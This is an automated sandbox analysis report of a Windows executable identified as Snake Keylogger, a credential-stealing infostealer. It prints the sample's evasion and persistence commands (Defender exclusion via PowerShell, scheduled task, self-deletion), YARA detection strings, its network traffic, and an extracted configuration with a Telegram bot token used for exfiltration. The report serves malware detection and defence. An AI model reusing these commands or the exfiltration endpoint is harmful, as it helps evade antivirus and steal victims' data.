Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PROFORMA + PENDENTES.exe

Overview

General Information

Sample name:PROFORMA + PENDENTES.exe
Analysis ID:1557908
MD5:4d74cebd8ddaae78de8144f1abb245e5
SHA1:8e8423e4af53a91b9750014235773f9ec38916df
SHA256:2a2625e85758dfdc4ab64036bb679f519b8802ecccdba37eec44fb99e68e35a9
Tags:exeuser-abuse_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PROFORMA + PENDENTES.exe (PID: 7924 cmdline: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)
    • powershell.exe (PID: 8152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2332 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7268 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PROFORMA + PENDENTES.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)
    • PROFORMA + PENDENTES.exe (PID: 7676 cmdline: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)
    • PROFORMA + PENDENTES.exe (PID: 3636 cmdline: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)
      • cmd.exe (PID: 7812 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 3660 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • WYqxTmjfOgdZ.exe (PID: 5512 cmdline: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)
    • schtasks.exe (PID: 7096 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WYqxTmjfOgdZ.exe (PID: 5420 cmdline: "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe" MD5: 4D74CEBD8DDAAE78DE8144F1ABB245E5)
      • cmd.exe (PID: 4424 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 4920 cmdline: choice /C Y /N /D Y /T 3 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8071929169:AAFUKNAcxQ6ezyCHGQASc7PxQv_smeADnUQ/sendMessage?chat_id=5985897351", "Token": "8071929169:AAFUKNAcxQ6ezyCHGQASc7PxQv_smeADnUQ", "Chat_id": "5985897351", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14879:$a1: get_encryptedPassword
      • 0x14b65:$a2: get_encryptedUsername
      • 0x14685:$a3: get_timePasswordChanged
      • 0x14780:$a4: get_passwordField
      • 0x1488f:$a5: set_encryptedPassword
      • 0x15ed0:$a7: get_logins
      • 0x15e33:$a10: KeyLoggerEventArgs
      • 0x15a9e:$a11: KeyLoggerEventArgsEventHandler
      0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x19808:$x1: $%SMTPDV$
      • 0x181ec:$x2: $#TheHashHere%&
      • 0x197b0:$x3: %FTPDV$
      • 0x1818c:$x4: $%TelegramDv$
      • 0x15a9e:$x5: KeyLoggerEventArgs
      • 0x15e33:$x5: KeyLoggerEventArgs
      • 0x197d4:$m2: Clipboard Logs ID
      • 0x19a12:$m2: Screenshot Logs ID
      • 0x19b22:$m2: keystroke Logs ID
      • 0x19dfc:$m3: SnakePW
      • 0x199ea:$m4: \SnakeKeylogger\
      00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 15 entries
        SourceRuleDescriptionAuthorStrings
        11.2.PROFORMA + PENDENTES.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          11.2.PROFORMA + PENDENTES.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            11.2.PROFORMA + PENDENTES.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              11.2.PROFORMA + PENDENTES.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x14a79:$a1: get_encryptedPassword
              • 0x14d65:$a2: get_encryptedUsername
              • 0x14885:$a3: get_timePasswordChanged
              • 0x14980:$a4: get_passwordField
              • 0x14a8f:$a5: set_encryptedPassword
              • 0x160d0:$a7: get_logins
              • 0x16033:$a10: KeyLoggerEventArgs
              • 0x15c9e:$a11: KeyLoggerEventArgsEventHandler
              11.2.PROFORMA + PENDENTES.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1c3be:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x1b5f0:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x1ba23:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1ca62:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 28 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ParentImage: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe, ParentProcessId: 7924, ParentProcessName: PROFORMA + PENDENTES.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ProcessId: 8152, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ParentImage: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe, ParentProcessId: 7924, ParentProcessName: PROFORMA + PENDENTES.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ProcessId: 8152, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe, ParentImage: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe, ParentProcessId: 5512, ParentProcessName: WYqxTmjfOgdZ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp", ProcessId: 7096, ProcessName: schtasks.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ParentImage: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe, ParentProcessId: 7924, ParentProcessName: PROFORMA + PENDENTES.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", ProcessId: 7268, ProcessName: schtasks.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ParentImage: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe, ParentProcessId: 7924, ParentProcessName: PROFORMA + PENDENTES.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ProcessId: 8152, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe", ParentImage: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe, ParentProcessId: 7924, ParentProcessName: PROFORMA + PENDENTES.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp", ProcessId: 7268, ProcessName: schtasks.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-18T18:18:46.999640+010028033053Unknown Traffic192.168.2.849712188.114.97.3443TCP
              2024-11-18T18:18:49.988518+010028033053Unknown Traffic192.168.2.849716188.114.97.3443TCP
              2024-11-18T18:18:52.714103+010028033053Unknown Traffic192.168.2.849722188.114.97.3443TCP
              2024-11-18T18:18:54.183906+010028033053Unknown Traffic192.168.2.849727188.114.97.3443TCP
              2024-11-18T18:18:54.487444+010028033053Unknown Traffic192.168.2.849729188.114.97.3443TCP
              2024-11-18T18:18:57.885212+010028033053Unknown Traffic192.168.2.849737188.114.97.3443TCP
              2024-11-18T18:19:01.307167+010028033053Unknown Traffic192.168.2.849741188.114.97.3443TCP
              2024-11-18T18:19:03.984760+010028033053Unknown Traffic192.168.2.849743188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-18T18:18:44.688413+010028032742Potentially Bad Traffic192.168.2.849709158.101.44.24280TCP
              2024-11-18T18:18:46.219431+010028032742Potentially Bad Traffic192.168.2.849709158.101.44.24280TCP
              2024-11-18T18:18:47.703797+010028032742Potentially Bad Traffic192.168.2.849713158.101.44.24280TCP
              2024-11-18T18:18:50.657522+010028032742Potentially Bad Traffic192.168.2.849717158.101.44.24280TCP
              2024-11-18T18:18:51.735169+010028032742Potentially Bad Traffic192.168.2.849717158.101.44.24280TCP
              2024-11-18T18:18:53.453796+010028032742Potentially Bad Traffic192.168.2.849724158.101.44.24280TCP
              2024-11-18T18:18:54.891309+010028032742Potentially Bad Traffic192.168.2.849731158.101.44.24280TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: PROFORMA + PENDENTES.exeAvira: detected
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeAvira: detection malicious, Label: HEUR/AGEN.1305624
              Source: 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8071929169:AAFUKNAcxQ6ezyCHGQASc7PxQv_smeADnUQ/sendMessage?chat_id=5985897351", "Token": "8071929169:AAFUKNAcxQ6ezyCHGQASc7PxQv_smeADnUQ", "Chat_id": "5985897351", "Version": "5.1"}
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeReversingLabs: Detection: 32%
              Source: PROFORMA + PENDENTES.exeReversingLabs: Detection: 32%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exeJoe Sandbox ML: detected
              Source: PROFORMA + PENDENTES.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: PROFORMA + PENDENTES.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49719 version: TLS 1.0
              Source: PROFORMA + PENDENTES.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Networking

              barindex
              Source: Yara matchFile source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49731 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49713 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49709 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49724 -> 158.101.44.242:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49716 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49737 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49743 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49729 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49741 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49719 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
